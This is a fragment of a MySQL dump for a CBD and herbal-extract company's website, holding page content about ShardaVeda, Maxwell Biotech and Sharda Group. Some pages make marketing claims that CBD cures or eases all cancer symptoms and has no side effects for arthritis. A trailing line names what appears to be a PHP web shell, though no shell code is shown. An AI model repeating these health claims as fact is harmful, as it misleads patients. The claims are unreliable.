Isolate','<p>CBD isolate is a chemical derived from the Cannabis sativa plant. It\'s the purest form of CBD because to the method producers remove (or isolate) the CBD from all of the other components of the plant.</p>\r\n','1','0','2023-07-15 06:37:09','2023-07-15 06:37:09','','cbd-isolate',1,'CBD Isolate');

/*Table structure for table `textual_pages_translations` */

DROP TABLE IF EXISTS `textual_pages_translations`;

CREATE TABLE `textual_pages_translations` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  `description` longtext,
  `abbr` char(2) DEFAULT NULL,
  `for_id` int(10) unsigned NOT NULL,
  `status` enum('1','0') DEFAULT '1',
  `is_deleted` enum('1','0') DEFAULT '0',
  `createdon` datetime NOT NULL,
  `modified_on` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=latin1;

/*Data for the table `textual_pages_translations` */

insert  into `textual_pages_translations`(`id`,`name`,`description`,`abbr`,`for_id`,`status`,`is_deleted`,`createdon`,`modified_on`) values (1,'Overview','<p>ShardaVeda is a manufacturer and exporter of premium herbal extracts, extracting CBD/CBG/CBN, Kratom and other herbal extracts from medicinal &amp; aromatic plants maintaining highest quality standards. Our products are suitable for use in the field of weight loss supplements, body care products, food business and industry various cosmetics</p>\r\n\r\n<p>With a head office and facility in Noida, we endeavor to supply quality extracts thorugh innovations. Customers can be assured that every products distributed by ShardaVeda are full of quality. With the use of modern technology, every step of the production is strictly controlled by a team of experts in various fields to obtain a standardized products and the best quality and satisfy every profitable opportunities and readiness in the global market.</p>\r\n\r\n<p>In addition to having a factory producing premium extracts, we also provide OEM manufacturing services and one-stop service.</p>\r\n',NULL,1,'1','0','2021-08-23 02:56:17','0000-00-00 00:00:00'),(2,NULL,NULL,NULL,2,'1','0','2021-08-27 08:58:53','2021-08-27 08:58:53'),(3,'CBD Frequently Asked Questions','<p>There is a lot of confusion surrounding CBD Products and the Cannabis industry. ‘The CBD Supplier’ hopes to answer some of the most commonly asked questions regarding CBD Oil and Cannabis in general. Check out our blog area which has more up to date information regarding the industry</p>\r\n',NULL,3,'1','0','2021-09-02 06:27:01','2021-09-02 06:27:01'),(4,'Career','',NULL,4,'1','0','2021-09-02 06:33:29','2021-09-02 06:33:29'),(5,'Disclaimer','<p>The information and services may contain bugs, errors, problems or other limitations. We and our affiliated parties have no liability whatsoever for your use of any information or service. In particular, but not as a limitation thereof, we and our affiliated parties are not liable for any indirect, special, incidental or consequential damages (including damages for loss of business, loss of profits, litigation, or the like), whether based on breach of contract, breach of warranty, tort (including negligence), product liability or otherwise, even if advised of the possibility of such damages. The negation of damages set forth above are fundamental elements of the basis of the bargain between us and you. This site and the information would not be provided without such limitations. No advice or information, whether oral or written, obtained by you from us through the site shall create any warranty, representation or guarantee not expressly stated in this agreement.</p>\r\n',NULL,5,'1','0','2021-09-02 06:35:06','2021-09-02 06:35:06'),(6,'Privacy Policy','<p>Our Privacy Policy, as it may change from time to time, is a part of this Agreement.</p>\r\n\r\n<p><strong>Links to Other Web Sites</strong></p>\r\n\r\n<p>The Site contains links to other Web sites. We are not responsible for the content, accuracy or opinions express in such Web sites, and such Web sites are not investigated, monitored or checked for accuracy or completeness by us. Inclusion of any linked Web site on our Site does not imply approval or endorsement of the linked Web site by us. If you decide to leave our Site and access these third-party sites, you do so at your own risk.</p>\r\n\r\n<p><strong>Information and Press Releases</strong></p>\r\n\r\n<p>The Site may contain information and press releases about us. While this information was believed to be accurate as of the date prepared, we disclaim any duty or obligation to update this information or any press releases. Information about companies other than ours contained in the press release or otherwise, should not be relied upon as being provided or endorsed by us.</p>\r\n',NULL,6,'1','0','2021-09-02 06:35:15','2021-09-02 06:35:15'),(7,'Terms & Conditions','<p>We reserve the right in our sole discretion to edit or delete any documents, information or other content appearing on the Site.</p>\r\n\r\n<p><strong>Indemnification</strong></p>\r\n\r\n<p>You agree to indemnify, defend and hold us and our partners, attorneys, staff and affiliates (collectively, \"Affiliated Parties\") harmless from any liability, loss, claim and expense, including reasonable attorney\'s fees, related to your violation of this Agreement or use of the Site.</p>\r\n\r\n<p><strong>Non-Transferable</strong></p>\r\n\r\n<p>Your right to use the Site is not transferable. Any password or right given to you to obtain information or documents is not transferable.</p>\r\n',NULL,7,'1','0','2021-09-02 06:35:31','2021-09-02 06:35:31'),(8,'Project Highlights','<section class=\"innerslider-contant\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<div class=\"contant-in\" style=\"text-align:center; border-bottom:0;\">\r\n<h3>Overview</h3>\r\n\r\n<p>The goal of this project proposal is to create herbal plants and hemp types with a THC concentration of less than 0.3 percent and a suitable CBD/CBG/CBG yield percentage.<br />\r\n<br />\r\nThe program\'s first step is to screen available indigenous herbal plants and hemp germplasm for THC and CBD/CBG/CBN content to determine their suitability for use in carrying out an effective breeding programme for the development of varieties with low THC content (less than 0.30 percent) and high CBD/CBG/CBN values.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Group</h3>\r\n\r\n<p>The accessible Germplasm may have a wide range of THC concentrations, ranging from 0 to 10%, which can only be discovered through biochemical profiling employing very advanced instruments and cutting-edge growth technologies, such as the NFT Hydroponic System.<br><br>\r\n\r\nThe joint Research programme also intends to extract CBD/CBG/CBN oil for medical and scientific advancement using new and highly advanced instruments. The project\'s goal is to research healthcare and wellness areas that have never been explored before, to improve and enrich humanity.\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda University</h3>\r\n<img src=\"./assets/imgs/sharda.jpg\" style=\"width:100%\" />\r\n<div class=\"university-contant\">\r\n<p>Maxwell\'s collaboration with Sharda University, Sharda Hospital, and an international organization will be a one-of-a-kind model that is sure to flourish.<br><br>\r\n\r\nBy being the most trusted organization in medicinal cannabis/herbal cultivation, CBD/CBG/CBN extraction, formulation, manufacturing, testing, and product development, Maxwell Biotech aspires to be a global player in the CBD/CBG/CBN and other derivatives industries.<br><br>\r\n\r\nIt also aims to increase the quality and yield of our crops by making the best use of available resources. We want to construct a cutting-edge hydrodynamic extraction system for extracting CBD, CBG, and CBN, as well as its derivatives, to the best of our ability.\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Hospital</h3>\r\n\r\n<p>The Hydrodynamic extraction system is a revolutionary new extraction method that utilizes the completely fresh Medicinal Cannabis plant in a one-of-a-kind process to preserve all volatile components.\r\n\r\nBy transforming the entire plant into Nanoemulsions that are then centrifuged and distilled, it is aimed to enhance the extraction of phytocannabinoids from active trichomes to maximize yields, increase potency, and generate higher bioavailability.\r\n\r\nThe procedure not only extracts the purest form of CBD/CBG/CBN but also prepares it for long-term preservation.<br><br>\r\n\r\nCancer patients have been shown to benefit from CBD, CBG, and CBN. Cancer patients frequently experience a variety of unpleasant symptoms, including pain, sadness, and sleep problems, in addition to their sickness.<br><br>\r\n\r\nWorse, chemotherapy-induced nausea and vomiting are common side effects of cancer treatment. All of these cancer symptoms can be alleviated by CBD/CBG/CBN.\r\n<br><br>\r\nThere\'s also a growing body of evidence suggesting that CBD may facilitate cancer cell death and slow the spread of aggressive cancer cells for breast cancer, although the research is still in the early stages.\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<p>\r\nThe demand for CBD/CBG/CBN in cancer patients has the potential to take CBD revenue generation to the next stage.<br>\r\nFurthermore, when it comes to treating Arthritis patients, CBD provides more comfort. It has been shown to help with arthritic pain reduction and has no negative side effects.<br><br>\r\n\r\nIndia is one of the countries having the biggest number of arthritis patients. This provides Maxwell Biotech with a new set of revenue-generating target markets.<br><br>\r\n\r\nAs a result, Maxwell wants to investigate novel pharmaceutical applications that have previously been interested in improving human existence through appropriate contemporary technology produced internally.\r\n\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n',NULL,8,'1','0','2021-09-06 10:29:45','2021-09-06 10:29:45'),(9,'Scenario in India','<section class=\"innerslider-contant\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<div class=\"contant-in\" style=\"text-align:center; border-bottom:0;\">\r\n<h3>Overview</h3>\r\n\r\n<p>The goal of this project proposal is to create herbal plants and hemp types with a THC concentration of less than 0.3 percent and a suitable CBD/CBG/CBG yield percentage.<br />\r\n<br />\r\nThe program\'s first step is to screen available indigenous herbal plants and hemp germplasm for THC and CBD/CBG/CBN content to determine their suitability for use in carrying out an effective breeding programme for the development of varieties with low THC content (less than 0.30 percent) and high CBD/CBG/CBN values.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Group</h3>\r\n\r\n<p>The accessible Germplasm may have a wide range of THC concentrations, ranging from 0 to 10%, which can only be discovered through biochemical profiling employing very advanced instruments and cutting-edge growth technologies, such as the NFT Hydroponic System.<br />\r\n<br />\r\nThe joint Research programme also intends to extract CBD/CBG/CBN oil for medical and scientific advancement using new and highly advanced instruments. The project\'s goal is to research healthcare and wellness areas that have never been explored before, to improve and enrich humanity.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda University</h3>\r\n<img src=\"./assets/imgs/sharda.jpg\" style=\"width:100%\" />\r\n<div class=\"university-contant\">\r\n<p>Maxwell\'s collaboration with Sharda University, Sharda Hospital, and an international organization will be a one-of-a-kind model that is sure to flourish.<br />\r\n<br />\r\nBy being the most trusted organization in medicinal cannabis/herbal cultivation, CBD/CBG/CBN extraction, formulation, manufacturing, testing, and product development, Maxwell Biotech aspires to be a global player in the CBD/CBG/CBN and other derivatives industries.<br />\r\n<br />\r\nIt also aims to increase the quality and yield of our crops by making the best use of available resources. We want to construct a cutting-edge hydrodynamic extraction system for extracting CBD, CBG, and CBN, as well as its derivatives, to the best of our ability.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Hospital</h3>\r\n\r\n<p>The Hydrodynamic extraction system is a revolutionary new extraction method that utilizes the completely fresh Medicinal Cannabis plant in a one-of-a-kind process to preserve all volatile components. By transforming the entire plant into Nanoemulsions that are then centrifuged and distilled, it is aimed to enhance the extraction of phytocannabinoids from active trichomes to maximize yields, increase potency, and generate higher bioavailability. The procedure not only extracts the purest form of CBD/CBG/CBN but also prepares it for long-term preservation.<br />\r\n<br />\r\nCancer patients have been shown to benefit from CBD, CBG, and CBN. Cancer patients frequently experience a variety of unpleasant symptoms, including pain, sadness, and sleep problems, in addition to their sickness.<br />\r\n<br />\r\nWorse, chemotherapy-induced nausea and vomiting are common side effects of cancer treatment. All of these cancer symptoms can be alleviated by CBD/CBG/CBN.<br />\r\n<br />\r\nThere\'s also a growing body of evidence suggesting that CBD may facilitate cancer cell death and slow the spread of aggressive cancer cells for breast cancer, although the research is still in the early stages.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<p>The demand for CBD/CBG/CBN in cancer patients has the potential to take CBD revenue generation to the next stage.<br />\r\nFurthermore, when it comes to treating Arthritis patients, CBD provides more comfort. It has been shown to help with arthritic pain reduction and has no negative side effects.<br />\r\n<br />\r\nIndia is one of the countries having the biggest number of arthritis patients. This provides Maxwell Biotech with a new set of revenue-generating target markets.<br />\r\n<br />\r\nAs a result, Maxwell wants to investigate novel pharmaceutical applications that have previously been interested in improving human existence through appropriate contemporary technology produced internally.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n',NULL,9,'1','0','2021-09-06 10:29:57','2021-09-06 10:29:57'),(10,'Project Background','<section class=\"innerslider-contant\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<div class=\"contant-in\" style=\"text-align:center; border-bottom:0;\">\r\n<h3>Overview</h3>\r\n\r\n<p>This project is being proposed by Maxwell Biotech Private Limited, a Sharda Group subsidiary, for extracting CBD/CBG/CBN and other herbal extracts from medicinal and aromatic plants, including hemp.<br><br>\r\nMaxwell Biotech was founded to bring research efforts in the realm of biotechnology to completion. Maxwell Biotech, a Sharda University sister unit, has set a goal to ensure that mankind is closely entwined to nature and natural products.\r\n\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Group</h3>\r\n\r\n<p>In the early 1980s, Sharda Group began as a distributor and manufacturer of dependable scientific equipment and instruments. Instruments for research laboratories and healthcare institutes were supplied by the company\'s two manufacturing sites.<br><br>\r\nSharda Group has diversified into the education, healthcare, construction, technology, and eCommerce sectors throughout time, and has built institutions and organizations both in India and internationally.\r\n\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda University</h3>\r\n<img src=\"./assets/imgs/sharda.jpg\" style=\"width:100%\" />\r\n<div class=\"university-contant\">\r\n<p>Sharda University (part of the Sharda Group) was the first private university in Greater Noida, Uttar Pradesh, India. The University is proud of the fact that many of its students and employees hail from Uttrakhand. It was founded in 2009 by an act of the Uttar Pradesh State Legislature and now provides over 216 UGC-accredited degrees in a variety of fields. It is genuinely a global institution, with students from more than 85 countries and academic collaborations with more than 250 universities across the world, allowing students to learn in a ‘GLOCAL\' setting.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Hospital</h3>\r\n\r\n<p>Sharda University comprises 14 multidisciplinary schools, including a medical school, with over 1200 faculty members from all over the world. Through Next StartUp, Syncubator, and Xcelerator, the University provides financial support for student start-ups and allows students to work on live projects in conjunction with DRDO, MSME, and other organizations. The University has more than 300 Research Scholars who are engaged in scientific research. Environmental education and raising awareness of scientific development among many stakeholders are critical components of the University\'s numerous R & D efforts.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<p>Sharda Hospital, a division of the Sharda Group, was founded in 2006 in Delhi–NCR as a state-of-the-art 900-bed super-specialty hospital. The hospital anchors the School of Medical Sciences and Research, and its affiliation with Sharda University provides chances for cross-functional and multi-disciplinary research and education. Sharda Hospital offers sophisticated illness and infection treatment, as well as routine community services and specialized critical care, including emergency transport. In late 2021, a contemporary cancer hospital with 900 beds is slated to open.<br><br>\r\nMaxwell Biotech has signed an MOU with Sharda University\'s Department of Bio-Technology, School of Agricultural Sciences, and School of Medical Sciences and Research to conduct a combined research programme on medicinal herbs and hemp (Cannabis Sativa L/Indica). Collaboration in innovative product development and process technology is currently being discussed with an established international organization.\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n',NULL,10,'1','0','2021-09-06 10:30:07','2021-09-06 10:30:07'),(11,'Company Background','<section class=\"innerslider-contant\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<div class=\"contant-in\" style=\"text-align:center; border-bottom:0;\">\r\n<h3>Overview</h3>\r\n\r\n<p>ShardaVeda is a line of wellness and natural healing products from Maxwell Biotech Private Limited. We manufacture and export premium herbal extracts, extracting Kratom, Ginseng, Lemongrass, Chamomile, Aloe Vera and other herbal extracts from medicinal &amp; aromatic plants maintaining highest quality standards. Our products are suitable for use in the field of weight loss supplements, body care products, food business and various industry cosmetics.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\">\r\n<p><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" /></p>\r\n\r\n<h3>Maxwell Biotech</h3>\r\n\r\n<p>Maxwell Biotech was established on 29 October 2020&nbsp; for bringing into fruition the research efforts in the field of Biotechnology. Maxwell Biotech has set its vision to ensure that mankind is closely entwined with nature and natural products.</p>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Group</h3>\r\n\r\n<p>Maxwell Biotech has signed an MOU with Sharda University’s Department of Bio-Technology, School of Agricultural Sciences &amp; School of Medical Sciences and Research to conduct a joint research program on Herbal Plants&amp; Hemp (Cannabis Sativa L/Indica) for medicinal use. A discussion with an established overseas organization is in progress for collaboration in new product development and process technology.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda University</h3>\r\n<img src=\"./assets/imgs/sharda.jpg\" style=\"width:100%\" />\r\n<div class=\"university-contant\">\r\n<p>Sharda University (part of the Sharda Group) was established in Greater Noida, Uttar Pradesh in the early 2000s and provides over 216 UGC-approved degrees in various streams. With students from more than 85 countries and academic collaborations with more than 250 universities across the world, it truly is a global university that offers a ‘GLOCAL\' learning environment. The University provides financial support for student’(s) start-ups through Next StartUp, Syncubator, Xcelerator and enables students’ live projects in collaboration with DRDO, MSME, and more. Sharda University is a multidisciplinary university with 14 schools and around 1000 faculty members from all over the world. At Sharda University, research has always been an important part of higher education.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n\r\n<section class=\"company-sec1\"><img class=\"imagesab\" src=\"./assets/imgs/circle-leaf.png\" />\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12\">\r\n<h3>Sharda Hospital</h3>\r\n\r\n<p>Sharda Hospital, a division of the Sharda Group, was founded in 2006 in Delhi–NCR as a state-of-the- art 1200+ bed super-specialty hospital. The hospital houses the School of Medical Sciences and Research, and its affiliation with Sharda University provides chances for cross-functional and multi- disciplinary research and education. Sharda Hospital provides advanced disease and infection treatment, as well as routine community services and specialized critical care, including emergency transport. In late 2021, a contemporary cancer hospital is expected to be operational.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</section>\r\n',NULL,11,'1','0','2021-09-06 10:30:19','2021-09-06 10:30:19');

/*Table structure for table `value_store` */

DROP TABLE IF EXISTS `value_store`;

CREATE TABLE `value_store` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `thekey` varchar(50) NOT NULL,
  `value` longtext NOT NULL,
  PRIMARY KEY (`id`),
  KEY `key` (`thekey`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8;

/*Data for the table `value_store` */

insert  into `value_store`(`id`,`thekey`,`value`) values (1,'footercopyright','Sharda Veda'),(2,'sitelogo','logo-sharda-veda.png'),(3,'footerContactAddr','Plot No. 32-34,</br>Knowledge Park III, </br> Greater Noida, </br>Uttar Pradesh - 201306'),(4,'footerContactPhone','+91 120-4033888'),(5,'footerContactEmail','info@shardaveda.com'),(6,'footerSocialFacebook',''),(7,'footerSocialTwitter',''),(8,'footerSociallinkedin',''),(9,'footerSocialInstagram',''),(10,'footerSocialYoutube',''),(11,'footerNational',''),(12,'footerInternational',''),(13,'sitelogo_two','logo-sharda-veda1.png');

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;

Kontol Shell Bypass